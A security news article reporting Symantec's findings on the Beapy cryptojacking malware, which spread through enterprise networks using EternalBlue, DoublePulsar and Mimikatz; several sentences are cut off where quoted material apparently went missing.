Security experts at Symantec have uncovered a new
“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published Symantec.
The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).
Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack. The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online by ShadowBrokers hacker group.
Most of the victims are located in China (80%), remaining in South Korea, Japan, and Vietnam.
The experts first observed the campaign in January, almost any victim is an enterprise (98%).
Once the backdoor is installed, a PowerShell command will allow the malware to connect the command and control server. The malicious code executes more PowerShell scripts before the crypto currency miner is downloaded.
Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.
Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.
It was coded in C rather than Python, this version also includes both
EternalBlue and Mimikatz.
The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.
“In the web server compromise,
Experts observed a spike in the activity of Beapy in March:
Since Coinhive cryptocurrency mining service shut down in March, experts observed a drop in cryptojacking attacks.
Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.
“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”
The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and a Trend Micro.
(SecurityAffairs – Beapy miner, hakcing)